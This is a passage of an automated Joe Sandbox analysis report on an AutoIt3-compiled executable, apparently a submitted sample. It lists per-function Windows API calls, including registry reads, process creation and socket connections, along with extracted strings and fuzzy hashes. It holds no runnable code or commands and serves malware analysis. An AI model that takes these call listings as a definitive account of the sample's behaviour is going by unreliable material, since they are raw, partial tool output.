                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 536824911-966354055

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,00000000,00000001,00000000), ref: 0077428C
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 00791BC7: __wcsicmp_l.LIBCMT ref: 00791C50
                                        • _wcscpy.LIBCMT ref: 007743C0
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 007E214E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Windows\Installer\MSI77F6.tmp$CMDLINE$CMDLINERAW
                                        • API String ID: 861526374-1733472223

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0078EA39
                                        • __wsplitpath.LIBCMT ref: 0078EA56
                                          • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
                                        • _wcsncat.LIBCMT ref: 0078EA69
                                        • __makepath.LIBCMT ref: 0078EA85
                                          • Part of subcall function 00792BFF: __wmakepath_s.LIBCMT ref: 00792C13
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • _wcscpy.LIBCMT ref: 0078EABE
                                          • Part of subcall function 0078EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0078EADA,?,?), ref: 0078EB27
                                        • _wcscat.LIBCMT ref: 007E32FC
                                        • _wcscat.LIBCMT ref: 007E3334
                                        • _wcsncpy.LIBCMT ref: 007E3370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                        • String ID: '/{$Include$\
                                        • API String ID: 1213536620-437149038
                                        • Opcode ID: 31f5630b54bed1d031f7cb8b8b5e825cc0ec25136bd3c92a06b4cbd76da06bae
                                        • Instruction ID: 5c612f8a9fc6501f81cf8502c5a26515359028a2e585f93d3076e31e7050f3ef
                                        • Opcode Fuzzy Hash: 31f5630b54bed1d031f7cb8b8b5e825cc0ec25136bd3c92a06b4cbd76da06bae
                                        • Instruction Fuzzy Hash: 6A513DB1404341AFC715EF99EC89C9BB7E8FB8D310F80492EF54987261EB789644CB66

                                        Control-flow Graph

                                        • Basic blocks 7b78ee-7b79c1; API calls on the graph: WSAStartup, gethostname, gethostbyname, inet_ntoa, WSACleanup (graph image not recoverable)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 208665112-3771769585
                                        • Opcode ID: c01a777dea57ec198feae01b3352a272ad5161ffc797b649d8e73cb1e8c23888
                                        • Instruction ID: c4083899449ed37c7ff7e86be68bf1ae6ade82d637ed7590ada63418fe6bad21
                                        • Opcode Fuzzy Hash: c01a777dea57ec198feae01b3352a272ad5161ffc797b649d8e73cb1e8c23888
                                        • Instruction Fuzzy Hash: 4711D231A08115AFDF38A760AC4AFEA77ACEF41720F004065F45596191EE7CEA81C6A4

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 007730B0
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007730BF
                                        • LoadIconW.USER32(00000063), ref: 007730D5
                                        • LoadIconW.USER32(000000A4), ref: 007730E7
                                        • LoadIconW.USER32(000000A2), ref: 007730F9
                                          • Part of subcall function 0077318A: LoadImageW.USER32(00770000,00000063,00000001,00000010,00000010,00000000), ref: 007731AE
                                        • RegisterClassExW.USER32(?), ref: 00773167
                                          • Part of subcall function 00772F58: GetSysColorBrush.USER32(0000000F), ref: 00772F8B
                                          • Part of subcall function 00772F58: RegisterClassExW.USER32(00000030), ref: 00772FB5
                                          • Part of subcall function 00772F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00772FC6
                                          • Part of subcall function 00772F58: LoadIconW.USER32(000000A9), ref: 00773009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 2880975755-4155596026
                                        • Opcode ID: 8800caa57000919e008410fa212776ac6c4af068caaa91100318ce27046f99bf
                                        • Instruction ID: 9c10b3bba00de5e3b42b6a0aa85a5ee5a2d2277b628a8dcc39581f146f5a206b
                                        • Opcode Fuzzy Hash: 8800caa57000919e008410fa212776ac6c4af068caaa91100318ce27046f99bf
                                        • Instruction Fuzzy Hash: C2213170E00304ABDF14DFA9EC4DA9DBBF5FB88750F00892AE618A62A0D7794544DF95

                                        Control-flow Graph

                                        • Basic blocks 7cb74b-7cbae3; API calls on the graph: VariantInit, CoInitialize, CoUninitialize, GetRunningObjectTable, SetErrorMode, CoGetInstanceFromFile, CoGetObject, VariantClear (graph image not recoverable)
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007CB777
                                        • CoInitialize.OLE32(00000000), ref: 007CB7A4
                                        • CoUninitialize.COMBASE ref: 007CB7AE
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 007CB8AE
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 007CB9DB
                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 007CBA0F
                                        • CoGetObject.OLE32(?,00000000,007FD91C,?), ref: 007CBA32
                                        • SetErrorMode.KERNEL32(00000000), ref: 007CBA45
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007CBAC5
                                        • VariantClear.OLEAUT32(007FD91C), ref: 007CBAD5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                        • String ID:
                                        • API String ID: 2395222682-0
                                        • Opcode ID: 594d8656f8e3454a5ad9bafb02b1065a855942456e1c6aee281f61a42793d97f
                                        • Instruction ID: a466908ea7c17df7eacec2aa6371fc08dbd92637dd57fd101981c2158112e3c8
                                        • Opcode Fuzzy Hash: 594d8656f8e3454a5ad9bafb02b1065a855942456e1c6aee281f61a42793d97f
                                        • Instruction Fuzzy Hash: 5BC11371608305EFC710DF64C889A2AB7E9FF89354F00891DF98A9B251DB79ED05CB92

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00772F8B
                                        • RegisterClassExW.USER32(00000030), ref: 00772FB5
                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00772FC6
                                        • LoadIconW.USER32(000000A9), ref: 00773009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 975902462-1005189915
                                        • Opcode ID: 4ce2412afc814a3d8eea5feb2d63f91879f83c8ecb55b0bd84f9cceb76dee447
                                        • Instruction ID: 90d044c8ef3554c3e18b5542f23bc3f634c89e640e6da6b9df97acdd6bf0beac
                                        • Opcode Fuzzy Hash: 4ce2412afc814a3d8eea5feb2d63f91879f83c8ecb55b0bd84f9cceb76dee447
                                        • Instruction Fuzzy Hash: 6121C5B5900318AFDF10AF94EC49BDDBBF5FB08B00F00852AF615A62A0D7B84544CFA9

                                        Control-flow Graph

                                        • Basic blocks 7d23c5-7d284f; API calls on the graph: GetSystemDirectoryW, GetCurrentDirectoryW, CreateProcessW, GetLastError, CloseHandle (graph image not recoverable)
                                        APIs
                                        • _memset.LIBCMT ref: 007D23E6
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007D2579
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007D259D
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007D25DD
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007D25FF
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007D2760
                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007D2792
                                        • CloseHandle.KERNEL32(?), ref: 007D27C1
                                        • CloseHandle.KERNEL32(?), ref: 007D2838
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                        • String ID:
                                        • API String ID: 4090791747-0
                                        • Opcode ID: 567bfce6abd3aa4cb71f66af61acf936d9e8e80cbf76a87a72ff6e97dacb940d
                                        • Instruction ID: 15c976a65d49472c626f526fdaadb2154e0aaaa22af77184fbeceb0717e64a16
                                        • Opcode Fuzzy Hash: 567bfce6abd3aa4cb71f66af61acf936d9e8e80cbf76a87a72ff6e97dacb940d
                                        • Instruction Fuzzy Hash: 4FD1A231604301DFCB25EF24D895A6ABBF1AF95350F14845EF8999B3A2DB38DC42CB52

                                        Control-flow Graph

                                        • Basic blocks 7cc8b7-7ccd0f; API calls on the graph: VariantInit, VariantClear, SysAllocString (graph image not recoverable)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: 8c41f6457afe904dfce7b69f97490e4c0dc0a85093c1faea28d7657d74182e29
                                        • Instruction ID: 8d6bfcf1dfb5fd08ffc1abf618fd45d621d8150b367cee9fd98345551a7cc4cf
                                        • Opcode Fuzzy Hash: 8c41f6457afe904dfce7b69f97490e4c0dc0a85093c1faea28d7657d74182e29
                                        • Instruction Fuzzy Hash: 81E1A2B1A00219ABDF21DFA4C895FAE77B9FF48354F14802DE949A7281D778ED41CB60

                                        Control-flow Graph

                                        • Basic blocks 7cbf80-7cc232; API calls on the graph: VariantInit, VariantClear (graph image not recoverable)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$_memset
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2862541840-625585964
                                        • Opcode ID: 18670fea7f23c07476f24ae8d487e01611a00387348cb8cc427c6a9d9394df41
                                        • Instruction ID: 2e3a48c81c6975b962fff7531c0f0253e06683a6569e1631c0a4bcfd086e5e4f
                                        • Opcode Fuzzy Hash: 18670fea7f23c07476f24ae8d487e01611a00387348cb8cc427c6a9d9394df41
                                        • Instruction Fuzzy Hash: DF91AEB1A00219EBCF25CFA5DC48FAEB7B8EF45710F14815DE919AB281D7789941CBA0
                                        APIs
                                          • Part of subcall function 00773F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007734E2,?,00000001), ref: 00773FCD
                                        • _free.LIBCMT ref: 007E3C27
                                        • _free.LIBCMT ref: 007E3C6E
                                          • Part of subcall function 0077BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,008322E8,?,00000000,?,00773E2E,?,00000000,?,0080DBF0,00000000,?), ref: 0077BE8B
                                          • Part of subcall function 0077BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00773E2E,?,00000000,?,0080DBF0,00000000,?,00000002), ref: 0077BEA7
                                          • Part of subcall function 0077BDF0: __wsplitpath.LIBCMT ref: 0077BF19
                                          • Part of subcall function 0077BDF0: _wcscpy.LIBCMT ref: 0077BF31
                                          • Part of subcall function 0077BDF0: _wcscat.LIBCMT ref: 0077BF46
                                          • Part of subcall function 0077BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0077BF56
                                        Strings
                                        Similarity
                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<w$G-w
                                        • API String ID: 1510338132-3880194010
                                        • Opcode ID: b667bbab0823e678fa5450439eb6a40e033a9952700192f34d9f1dd090d4387b
                                        • Instruction ID: 83b290efbefe7a2b13391f52b8c2560bd7454457ea31fac8bedbb2be21409da9
                                        • Opcode Fuzzy Hash: b667bbab0823e678fa5450439eb6a40e033a9952700192f34d9f1dd090d4387b
                                        • Instruction Fuzzy Hash: DF915071911259EFCF04EFA5CC599EE77B4BF08350F10842AF416EB291DB789A45CB50
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0078EADA,?,?), ref: 0078EB27
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0078EADA,?,?), ref: 007E4B26
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0078EADA,?,?), ref: 007E4B65
                                        • RegCloseKey.ADVAPI32(?,?,0078EADA,?,?), ref: 007E4B94
                                        Strings
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                        • API String ID: 1586453840-614718249
                                        • Opcode ID: 12037a25c973b08b9c11ccfac86477982e6f276711320843294fe67420ba1fde
                                        • Instruction ID: 0bfbbbad13f254442bb932e4277f032f7eebe36c28e55db4eac364c35759871b
                                        • Opcode Fuzzy Hash: 12037a25c973b08b9c11ccfac86477982e6f276711320843294fe67420ba1fde
                                        • Instruction Fuzzy Hash: F4114F71601208BEEF149BA4DD86EBE77BCEF04354F104059F506E6191EA789E41DB54
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00772ECB
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00772EEC
                                        • ShowWindow.USER32(00000000), ref: 00772F00
                                        • ShowWindow.USER32(00000000), ref: 00772F09
                                        Strings
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: cc5e78657cdec68fd25d89ad9aaa90ff7a7e8f9f7808cc8a910515e1cde26a24
                                        • Instruction ID: 73e11dcf9d8e52eeb887564c4e76537685aecb7972f11894077ac7ae112cf813
                                        • Opcode Fuzzy Hash: cc5e78657cdec68fd25d89ad9aaa90ff7a7e8f9f7808cc8a910515e1cde26a24
                                        • Instruction Fuzzy Hash: 40F030706406D07AEB3057576C5CE772E7EF7C6F60F01441EBA04D21A0C2650885DAB0
                                        APIs
                                        • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 007C9409
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9416
                                        • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 007C943A
                                        • _strlen.LIBCMT ref: 007C9484
                                        • _memmove.LIBCMT ref: 007C94CA
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C94F7
                                        Similarity
                                        • API ID: ErrorLast$_memmove_strlenselect
                                        • String ID:
                                        • API String ID: 2795762555-0
                                        • Opcode ID: 0bf68db129e1443b4a5c918f6eb51c747f9e4cbcd0a56a00a4a4a25c4d7b5c5a
                                        • Instruction ID: e5de815e57bf59d204047ce1a066118a23cd1c97af6c030e1536e3d4475c1f05
                                        • Opcode Fuzzy Hash: 0bf68db129e1443b4a5c918f6eb51c747f9e4cbcd0a56a00a4a4a25c4d7b5c5a
                                        • Instruction Fuzzy Hash: 0B413475500144EFCB58EB64CD99FAEB7B9EF48310F10815DF51A97291DB389E41CB60
                                        APIs
                                          • Part of subcall function 00773B1E: _wcsncpy.LIBCMT ref: 00773B32
                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007B6DBA
                                        • GetLastError.KERNEL32 ref: 007B6DC5
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007B6DD9
                                        • _wcsrchr.LIBCMT ref: 007B6DFB
                                          • Part of subcall function 007B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007B6E31
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                        • String ID:
                                        • API String ID: 3633006590-0
                                        • Opcode ID: 69423686cb5a6d58befd11eabba671f88f73680d0f96b7b62800f1c965aa12cc
                                        • Instruction ID: ace3d380cc94c66541baabfda11e598d26b5a3a8ec18531d223c24b4b8c20cb1
                                        • Opcode Fuzzy Hash: 69423686cb5a6d58befd11eabba671f88f73680d0f96b7b62800f1c965aa12cc
                                        • Instruction Fuzzy Hash: 0E21D2657413189ADF246774EC5EBEE33ACAF01310F204565E625C30E2EB2CDE849B54
                                        APIs
                                          • Part of subcall function 007CACD3: inet_addr.WS2_32(00000000), ref: 007CACF5
                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 007C9160
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C916F
                                        • connect.WS2_32(00000000,?,00000010), ref: 007C918B
                                        Similarity
                                        • API ID: ErrorLastconnectinet_addrsocket
                                        • String ID:
                                        • API String ID: 3701255441-0
                                        • Opcode ID: 4c6104737f2a4d67e37d3ce60987902075d3356b562b4593adc0e1eecdfcbecd
                                        • Instruction ID: e67fd800033d4b8a457c9c6b1a8b503d0df8120ca0abd9c93955c33d63623236
                                        • Opcode Fuzzy Hash: 4c6104737f2a4d67e37d3ce60987902075d3356b562b4593adc0e1eecdfcbecd
                                        • Instruction Fuzzy Hash: 5B215131240215AFDB10BF68CC9EF7E77A9EF49724F08845DF9169B392DA78AC018761
                                        APIs
                                        • SHGetMalloc.SHELL32(1<w), ref: 00773A7D
                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00773AD2
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00773A8F
                                          • Part of subcall function 00773B1E: _wcsncpy.LIBCMT ref: 00773B32
                                        Strings
                                        Similarity
                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                        • String ID: 1<w
                                        • API String ID: 3981382179-1736100821
                                        • Opcode ID: 1ddf1c5f4a2f217228f594de835b6f7a825b3fe45e95878108b5e5935f3ad072
                                        • Instruction ID: 25be928cb47ca8187a98b89ffaee4e6f074805185df0be9c1d72ed0d04a34296
                                        • Opcode Fuzzy Hash: 1ddf1c5f4a2f217228f594de835b6f7a825b3fe45e95878108b5e5935f3ad072
                                        • Instruction Fuzzy Hash: 48219276B00114ABCB24DF95DC88DEEB7BEEF88750B1084A4F509D7250DB349E46DB94
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0078C948,SwapMouseButtons,00000004,?), ref: 0078C979
                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0078C948,SwapMouseButtons,00000004,?,?,?,?,0078BF22), ref: 0078C99A
                                        • RegCloseKey.KERNEL32(00000000,?,?,0078C948,SwapMouseButtons,00000004,?,?,?,?,0078BF22), ref: 0078C9BC
                                        Strings
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: b9d3e1ba4eedcd78c1b8c6ca0996367167f9ddfd3a0bbe5ed0e99405de487725
                                        • Instruction ID: a8e2e6793a794a0490598450be9e288ae561fefa65d02d03c473c22d3fbfa773
                                        • Opcode Fuzzy Hash: b9d3e1ba4eedcd78c1b8c6ca0996367167f9ddfd3a0bbe5ed0e99405de487725
                                        • Instruction Fuzzy Hash: 65117C75551218FFDB229F64DC48EAE77B8EF04750F00849AF941E7210E635AE40DB64
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aab94bef7967c6cc3f2ee8217cff4c1f974a54f36afbaafac4d8e591283643f5
                                        • Instruction ID: 0ac330b1ce1ccbe2c34e1b88199a3cd6bdb3d8b3c857e4fa2e42c70e5769e4de
                                        • Opcode Fuzzy Hash: aab94bef7967c6cc3f2ee8217cff4c1f974a54f36afbaafac4d8e591283643f5
                                        • Instruction Fuzzy Hash: 84C17075A00216EFCB14CF94C984EAEB7B5FF89710F108699E901EB251D734EE41DBA1
                                        APIs
                                          • Part of subcall function 007716F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00771751
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077159B
                                        • CoInitialize.OLE32(00000000), ref: 00771612
                                        • CloseHandle.KERNEL32(00000000), ref: 007E58F7
                                        Strings
                                        Similarity
                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                        • String ID: '/{
                                        • API String ID: 458326420-394795438
                                        • Opcode ID: 8bae7086d8d247fb3a9d72421d6383f19b189f7c5c2837e123ad65b21ac39870
                                        • Instruction ID: a07c555ea26fbbce694d64ef3ba20c56c67ce49e1040eb905a3db3232fab45f5
                                        • Opcode Fuzzy Hash: 8bae7086d8d247fb3a9d72421d6383f19b189f7c5c2837e123ad65b21ac39870
                                        • Instruction Fuzzy Hash: 5171CCB4901240CBCF10EFAAB8DD454BBA6FBD8B44798892ED10AC7362DB784448CF59
                                        APIs
                                          • Part of subcall function 007741A7: _fseek.LIBCMT ref: 007741BF
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF49
                                          • Part of subcall function 007BCE59: _wcscmp.LIBCMT ref: 007BCF5C
                                        • _free.LIBCMT ref: 007BCDC9
                                        • _free.LIBCMT ref: 007BCDD0
